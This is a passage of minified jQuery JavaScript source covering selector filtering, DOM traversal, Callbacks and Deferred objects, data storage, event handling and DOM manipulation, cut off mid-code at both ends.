c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ia(function(a){return null==a.getAttribute("disabled")})||ja(K,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fa}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.uniqueSort=n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&n(a).is(c))break;d.push(a)}return d},v=function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c},w=n.expr.match.needsContext,x=/^<([\w-]+)\s*\/?>(?:<\/\1>|)$/,y=/^.[^:#\[\.,]*$/;function z(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(y.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return h.call(b,a)>-1!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=this.length,d=[],e=this;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;c>b;b++)if(n.contains(e[b],this))return!0}));for(b=0;c>b;b++)n.find(a,e[b],d);return d=this.pushStack(c>1?n.unique(d):d),d.selector=this.selector?this.selector+" "+a:a,d},filter:function(a){return this.pushStack(z(this,a||[],!1))},not:function(a){return this.pushStack(z(this,a||[],!0))},is:function(a){return!!z(this,"string"==typeof a&&w.test(a)?n(a):a||[],!1).length}});var A,B=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=n.fn.init=function(a,b,c){var e,f;if(!a)return this;if(c=c||A,"string"==typeof a){if(e="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:B.exec(a),!e||!e[1]&&b)return!b||b.jquery?(b||c).find(a):this.constructor(b).find(a);if(e[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(e[1],b&&b.nodeType?b.ownerDocument||b:d,!0)),x.test(e[1])&&n.isPlainObject(b))for(e in b)n.isFunction(this[e])?this[e](b[e]):this.attr(e,b[e]);return this}return f=d.getElementById(e[2]),f&&f.parentNode&&(this.length=1,this[0]=f),this.context=d,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?void 0!==c.ready?c.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};C.prototype=n.fn,A=n(d);var D=/^(?:parents|prev(?:Until|All))/,E={children:!0,contents:!0,next:!0,prev:!0};n.fn.extend({has:function(a){var b=n(a,this),c=b.length;return this.filter(function(){for(var a=0;c>a;a++)if(n.contains(this,b[a]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=w.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.uniqueSort(f):f)},index:function(a){return a?"string"==typeof a?h.call(n(a),this[0]):h.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.uniqueSort(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function F(a,b){while((a=a[b])&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return u(a,"parentNode")},parentsUntil:function(a,b,c){return u(a,"parentNode",c)},next:function(a){return F(a,"nextSibling")},prev:function(a){return F(a,"previousSibling")},nextAll:function(a){return u(a,"nextSibling")},prevAll:function(a){return u(a,"previousSibling")},nextUntil:function(a,b,c){return u(a,"nextSibling",c)},prevUntil:function(a,b,c){return u(a,"previousSibling",c)},siblings:function(a){return v((a.parentNode||{}).firstChild,a)},children:function(a){return v(a.firstChild)},contents:function(a){return a.contentDocument||n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(E[a]||n.uniqueSort(e),D.test(a)&&e.reverse()),this.pushStack(e)}});var G=/\S+/g;function H(a){var b={};return n.each(a.match(G)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?H(a):n.extend({},a);var b,c,d,e,f=[],g=[],h=-1,i=function(){for(e=a.once,d=b=!0;g.length;h=-1){c=g.shift();while(++h<f.length)f[h].apply(c[0],c[1])===!1&&a.stopOnFalse&&(h=f.length,c=!1)}a.memory||(c=!1),b=!1,e&&(f=c?[]:"")},j={add:function(){return f&&(c&&!b&&(h=f.length-1,g.push(c)),function d(b){n.each(b,function(b,c){n.isFunction(c)?a.unique&&j.has(c)||f.push(c):c&&c.length&&"string"!==n.type(c)&&d(c)})}(arguments),c&&!b&&i()),this},remove:function(){return n.each(arguments,function(a,b){var c;while((c=n.inArray(b,f,c))>-1)f.splice(c,1),h>=c&&h--}),this},has:function(a){return a?n.inArray(a,f)>-1:f.length>0},empty:function(){return f&&(f=[]),this},disable:function(){return e=g=[],f=c="",this},disabled:function(){return!f},lock:function(){return e=g=[],c||(f=c=""),this},locked:function(){return!!e},fireWith:function(a,c){return e||(c=c||[],c=[a,c.slice?c.slice():c],g.push(c),b||i()),this},fire:function(){return j.fireWith(this,arguments),this},fired:function(){return!!d}};return j},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().progress(c.notify).done(c.resolve).fail(c.reject):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=e.call(arguments),d=c.length,f=1!==d||a&&n.isFunction(a.promise)?d:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(d){b[a]=this,c[a]=arguments.length>1?e.call(arguments):d,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(d>1)for(i=new Array(d),j=new Array(d),k=new Array(d);d>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().progress(h(b,j,i)).done(h(b,k,c)).fail(g.reject):--f;return f||g.resolveWith(k,c),g.promise()}});var I;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){(a===!0?--n.readyWait:n.isReady)||(n.isReady=!0,a!==!0&&--n.readyWait>0||(I.resolveWith(d,[n]),n.fn.triggerHandler&&(n(d).triggerHandler("ready"),n(d).off("ready"))))}});function J(){d.removeEventListener("DOMContentLoaded",J),a.removeEventListener("load",J),n.ready()}n.ready.promise=function(b){return I||(I=n.Deferred(),"complete"===d.readyState||"loading"!==d.readyState&&!d.documentElement.doScroll?a.setTimeout(n.ready):(d.addEventListener("DOMContentLoaded",J),a.addEventListener("load",J))),I.promise(b)},n.ready.promise();var K=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)K(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},L=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function M(){this.expando=n.expando+M.uid++}M.uid=1,M.prototype={register:function(a,b){var c=b||{};return a.nodeType?a[this.expando]=c:Object.defineProperty(a,this.expando,{value:c,writable:!0,configurable:!0}),a[this.expando]},cache:function(a){if(!L(a))return{};var b=a[this.expando];return b||(b={},L(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[b]=c;else for(d in b)e[d]=b[d];return e},get:function(a,b){return void 0===b?this.cache(a):a[this.expando]&&a[this.expando][b]},access:function(a,b,c){var d;return void 0===b||b&&"string"==typeof b&&void 0===c?(d=this.get(a,b),void 0!==d?d:this.get(a,n.camelCase(b))):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d,e,f=a[this.expando];if(void 0!==f){if(void 0===b)this.register(a);else{n.isArray(b)?d=b.concat(b.map(n.camelCase)):(e=n.camelCase(b),b in f?d=[b,e]:(d=e,d=d in f?[d]:d.match(G)||[])),c=d.length;while(c--)delete f[d[c]]}(void 0===b||n.isEmptyObject(f))&&(a.nodeType?a[this.expando]=void 0:delete a[this.expando])}},hasData:function(a){var b=a[this.expando];return void 0!==b&&!n.isEmptyObject(b)}};var N=new M,O=new M,P=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,Q=/[A-Z]/g;function R(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(Q,"-$&").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:P.test(c)?n.parseJSON(c):c;
3 | }catch(e){}O.set(a,b,c)}else c=void 0;return c}n.extend({hasData:function(a){return O.hasData(a)||N.hasData(a)},data:function(a,b,c){return O.access(a,b,c)},removeData:function(a,b){O.remove(a,b)},_data:function(a,b,c){return N.access(a,b,c)},_removeData:function(a,b){N.remove(a,b)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=O.get(f),1===f.nodeType&&!N.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),R(f,d,e[d])));N.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){O.set(this,a)}):K(this,function(b){var c,d;if(f&&void 0===b){if(c=O.get(f,a)||O.get(f,a.replace(Q,"-$&").toLowerCase()),void 0!==c)return c;if(d=n.camelCase(a),c=O.get(f,d),void 0!==c)return c;if(c=R(f,d,void 0),void 0!==c)return c}else d=n.camelCase(a),this.each(function(){var c=O.get(this,d);O.set(this,d,b),a.indexOf("-")>-1&&void 0!==c&&O.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){O.remove(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=N.get(a,b),c&&(!d||n.isArray(c)?d=N.access(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return N.get(a,c)||N.access(a,c,{empty:n.Callbacks("once memory").add(function(){N.remove(a,[b+"queue",c])})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?n.queue(this[0],a):void 0===b?this:this.each(function(){var c=n.queue(this,a,b);n._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&n.dequeue(this,a)})},dequeue:function(a){return this.each(function(){n.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=n.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=N.get(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=new RegExp("^(?:([+-])=|)("+S+")([a-z%]*)$","i"),U=["Top","Right","Bottom","Left"],V=function(a,b){return a=b||a,"none"===n.css(a,"display")||!n.contains(a.ownerDocument,a)};function W(a,b,c,d){var e,f=1,g=20,h=d?function(){return d.cur()}:function(){return n.css(a,b,"")},i=h(),j=c&&c[3]||(n.cssNumber[b]?"":"px"),k=(n.cssNumber[b]||"px"!==j&&+i)&&T.exec(n.css(a,b));if(k&&k[3]!==j){j=j||k[3],c=c||[],k=+i||1;do f=f||".5",k/=f,n.style(a,b,k+j);while(f!==(f=h()/i)&&1!==f&&--g)}return c&&(k=+k||+i||0,e=c[1]?k+(c[1]+1)*c[2]:+c[2],d&&(d.unit=j,d.start=k,d.end=e)),e}var X=/^(?:checkbox|radio)$/i,Y=/<([\w:-]+)/,Z=/^$|\/(?:java|ecma)script/i,$={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};$.optgroup=$.option,$.tbody=$.tfoot=$.colgroup=$.caption=$.thead,$.th=$.td;function _(a,b){var c="undefined"!=typeof a.getElementsByTagName?a.getElementsByTagName(b||"*"):"undefined"!=typeof a.querySelectorAll?a.querySelectorAll(b||"*"):[];return void 0===b||b&&n.nodeName(a,b)?n.merge([a],c):c}function aa(a,b){for(var c=0,d=a.length;d>c;c++)N.set(a[c],"globalEval",!b||N.get(b[c],"globalEval"))}var ba=/<|&#?\w+;/;function ca(a,b,c,d,e){for(var f,g,h,i,j,k,l=b.createDocumentFragment(),m=[],o=0,p=a.length;p>o;o++)if(f=a[o],f||0===f)if("object"===n.type(f))n.merge(m,f.nodeType?[f]:f);else if(ba.test(f)){g=g||l.appendChild(b.createElement("div")),h=(Y.exec(f)||["",""])[1].toLowerCase(),i=$[h]||$._default,g.innerHTML=i[1]+n.htmlPrefilter(f)+i[2],k=i[0];while(k--)g=g.lastChild;n.merge(m,g.childNodes),g=l.firstChild,g.textContent=""}else m.push(b.createTextNode(f));l.textContent="",o=0;while(f=m[o++])if(d&&n.inArray(f,d)>-1)e&&e.push(f);else if(j=n.contains(f.ownerDocument,f),g=_(l.appendChild(f),"script"),j&&aa(g),c){k=0;while(f=g[k++])Z.test(f.type||"")&&c.push(f)}return l}!function(){var a=d.createDocumentFragment(),b=a.appendChild(d.createElement("div")),c=d.createElement("input");c.setAttribute("type","radio"),c.setAttribute("checked","checked"),c.setAttribute("name","t"),b.appendChild(c),l.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,b.innerHTML="<textarea>x</textarea>",l.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var da=/^key/,ea=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,fa=/^([^.]*)(?:\.(.+)|)/;function ga(){return!0}function ha(){return!1}function ia(){try{return d.activeElement}catch(a){}}function ja(a,b,c,d,e,f){var g,h;if("object"==typeof b){"string"!=typeof c&&(d=d||c,c=void 0);for(h in b)ja(a,h,c,d,b[h],f);return a}if(null==d&&null==e?(e=c,d=c=void 0):null==e&&("string"==typeof c?(e=d,d=void 0):(e=d,d=c,c=void 0)),e===!1)e=ha;else if(!e)return a;return 1===f&&(g=e,e=function(a){return n().off(a),g.apply(this,arguments)},e.guid=g.guid||(g.guid=n.guid++)),a.each(function(){n.event.add(this,b,e,d,c)})}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=N.get(a);if(r){c.handler&&(f=c,c=f.handler,e=f.selector),c.guid||(c.guid=n.guid++),(i=r.events)||(i=r.events={}),(g=r.handle)||(g=r.handle=function(b){return"undefined"!=typeof n&&n.event.triggered!==b.type?n.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(G)||[""],j=b.length;while(j--)h=fa.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o&&(l=n.event.special[o]||{},o=(e?l.delegateType:l.bindType)||o,l=n.event.special[o]||{},k=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},f),(m=i[o])||(m=i[o]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,p,g)!==!1||a.addEventListener&&a.addEventListener(o,g)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),n.event.global[o]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=N.hasData(a)&&N.get(a);if(r&&(i=r.events)){b=(b||"").match(G)||[""],j=b.length;while(j--)if(h=fa.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=i[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&q!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&N.remove(a,"handle events")}},dispatch:function(a){a=n.event.fix(a);var b,c,d,f,g,h=[],i=e.call(arguments),j=(N.get(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,c=0;while((g=f.handlers[c++])&&!a.isImmediatePropagationStopped())a.rnamespace&&!a.rnamespace.test(g.namespace)||(a.handleObj=g,a.data=g.data,d=((n.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==d&&(a.result=d)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&("click"!==a.type||isNaN(a.button)||a.button<1))for(;i!==this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(d=[],c=0;h>c;c++)f=b[c],e=f.selector+" ",void 0===d[e]&&(d[e]=f.needsContext?n(e,this).index(i)>-1:n.find(e,this,null,[i]).length),d[e]&&d.push(f);d.length&&g.push({elem:i,handlers:d})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},props:"altKey bubbles cancelable ctrlKey currentTarget detail eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,e,f,g=b.button;return null==a.pageX&&null!=b.clientX&&(c=a.target.ownerDocument||d,e=c.documentElement,f=c.body,a.pageX=b.clientX+(e&&e.scrollLeft||f&&f.scrollLeft||0)-(e&&e.clientLeft||f&&f.clientLeft||0),a.pageY=b.clientY+(e&&e.scrollTop||f&&f.scrollTop||0)-(e&&e.clientTop||f&&f.clientTop||0)),a.which||void 0===g||(a.which=1&g?1:2&g?3:4&g?2:0),a}},fix:function(a){if(a[n.expando])return a;var b,c,e,f=a.type,g=a,h=this.fixHooks[f];h||(this.fixHooks[f]=h=ea.test(f)?this.mouseHooks:da.test(f)?this.keyHooks:{}),e=h.props?this.props.concat(h.props):this.props,a=new n.Event(g),b=e.length;while(b--)c=e[b],a[c]=g[c];return a.target||(a.target=d),3===a.target.nodeType&&(a.target=a.target.parentNode),h.filter?h.filter(a,g):a},special:{load:{noBubble:!0},focus:{trigger:function(){return this!==ia()&&this.focus?(this.focus(),!1):void 0},delegateType:"focusin"},blur:{trigger:function(){return this===ia()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return"checkbox"===this.type&&this.click&&n.nodeName(this,"input")?(this.click(),!1):void 0},_default:function(a){return n.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}}},n.removeEvent=function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c)},n.Event=function(a,b){return this instanceof n.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?ga:ha):this.type=a,b&&n.extend(this,b),this.timeStamp=a&&a.timeStamp||n.now(),void(this[n.expando]=!0)):new n.Event(a,b)},n.Event.prototype={constructor:n.Event,isDefaultPrevented:ha,isPropagationStopped:ha,isImmediatePropagationStopped:ha,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=ga,a&&a.preventDefault()},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=ga,a&&a.stopPropagation()},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=ga,a&&a.stopImmediatePropagation(),this.stopPropagation()}},n.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){n.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return e&&(e===d||n.contains(d,e))||(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),n.fn.extend({on:function(a,b,c,d){return ja(this,a,b,c,d)},one:function(a,b,c,d){return ja(this,a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,n(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return b!==!1&&"function"!=typeof b||(c=b,b=void 0),c===!1&&(c=ha),this.each(function(){n.event.remove(this,a,c,b)})}});var ka=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi,la=/<script|<style|<link/i,ma=/checked\s*(?:[^=]|=\s*.checked.)/i,na=/^true\/(.*)/,oa=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function pa(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function qa(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function ra(a){var b=na.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function sa(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(N.hasData(a)&&(f=N.access(a),g=N.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;d>c;c++)n.event.add(b,e,j[e][c])}O.hasData(a)&&(h=O.access(a),i=n.extend({},h),O.set(b,i))}}function ta(a,b){var c=b.nodeName.toLowerCase();"input"===c&&X.test(a.type)?b.checked=a.checked:"input"!==c&&"textarea"!==c||(b.defaultValue=a.defaultValue)}function ua(a,b,c,d){b=f.apply([],b);var e,g,h,i,j,k,m=0,o=a.length,p=o-1,q=b[0],r=n.isFunction(q);if(r||o>1&&"string"==typeof q&&!l.checkClone&&ma.test(q))return a.each(function(e){var f=a.eq(e);r&&(b[0]=q.call(this,e,f.html())),ua(f,b,c,d)});if(o&&(e=ca(b,a[0].ownerDocument,!1,a,d),g=e.firstChild,1===e.childNodes.length&&(e=g),g||d)){for(h=n.map(_(e,"script"),qa),i=h.length;o>m;m++)j=e,m!==p&&(j=n.clone(j,!0,!0),i&&n.merge(h,_(j,"script"))),c.call(a[m],j,m);if(i)for(k=h[h.length-1].ownerDocument,n.map(h,ra),m=0;i>m;m++)j=h[m],Z.test(j.type||"")&&!N.access(j,"globalEval")&&n.contains(k,j)&&(j.src?n._evalUrl&&n._evalUrl(j.src):n.globalEval(j.textContent.replace(oa,"")))}return a}function va(a,b,c){for(var d,e=b?n.filter(b,a):a,f=0;null!=(d=e[f]);f++)c||1!==d.nodeType||n.cleanData(_(d)),d.parentNode&&(c&&n.contains(d.ownerDocument,d)&&aa(_(d,"script")),d.parentNode.removeChild(d));return a}n.extend({htmlPrefilter:function(a){return a.replace(ka,"<$1></$2>")},clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=n.contains(a.ownerDocument,a);if(!(l.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(g=_(h),f=_(a),d=0,e=f.length;e>d;d++)ta(f[d],g[d]);if(b)if(c)for(f=f||_(a),g=g||_(h),d=0,e=f.length;e>d;d++)sa(f[d],g[d]);else sa(a,h);return g=_(h,"script"),g.length>0&&aa(g,!i&&_(a,"script")),h},cleanData:function(a){for(var b,c,d,e=n.event.special,f=0;void 0!==(c=a[f]);f++)if(L(c)){if(b=c[N.expando]){if(b.events)for(d in b.events)e[d]?n.event.remove(c,d):n.removeEvent(c,d,b.handle);c[N.expando]=void 0}c[O.expando]&&(c[O.expando]=void 0)}}}),n.fn.extend({domManip:ua,detach:function(a){return va(this,a,!0)},remove:function(a){return va(this,a)},text:function(a){return K(this,function(a){return void 0===a?n.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return ua(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=pa(this,a);b.appendChild(a)}})},prepend:function(){return ua(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=pa(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return ua(this,arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return ua(this,arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(n.cleanData(_(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return K(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!la.test(a)&&!$[(Y.exec(a)||["",""])[1].toLowerCase()]){a=n.htmlPrefilter(a);try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(_(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=[];return ua(this,arguments,function(b){var c=this.parentNode;n.inArray(this,a)<0&&(n.cleanData(_(this)),c&&c.replaceChild(b,this))},a)}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=[],e=n(a),f=e.length-1,h=0;f>=h;h++)c=h===f?this:this.clone(!0),n(e[h])[b](c),g.apply(d,c.get());return this.pushStack(d)}});var wa,xa={HTML:"block",BODY:"block"};function ya(a,b){var c=n(b.createElement(a)).appendTo(b.body),d=n.css(c[0],"display");return c.detach(),d}function za(a){var b=d,c=xa[a];return c||(c=ya(a,b),"none"!==c&&c||(wa=(wa||n("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=wa[0].contentDocument,b.write(),b.close(),c=ya(a,b),wa.detach()),xa[a]=c),c}var Aa=/^margin/,Ba=new RegExp("^("+S+")(?!px)[a-z%]+$","i"),Ca=function(b){var c=b.ownerDocument.defaultView;return c&&c.opener||(c=a),c.getComputedStyle(b)},Da=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e},Ea=d.documentElement;!function(){var b,c,e,f,g=d.createElement("div"),h=d.createElement("div");if(h.style){h.style.backgroundClip="content-box",h.cloneNode(!0).style.backgroundClip="",l.clearCloneStyle="content-box"===h.style.backgroundClip,g.style.cssText="border:0;width:8px;height:0;top:0;left:-9999px;padding:0;margin-top:1px;position:absolute",g.appendChild(h);function i(){h.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;position:relative;display:block;margin:auto;border:1px;padding:1px;top:1%;width:50%",h.innerHTML="",Ea.appendChild(g);var 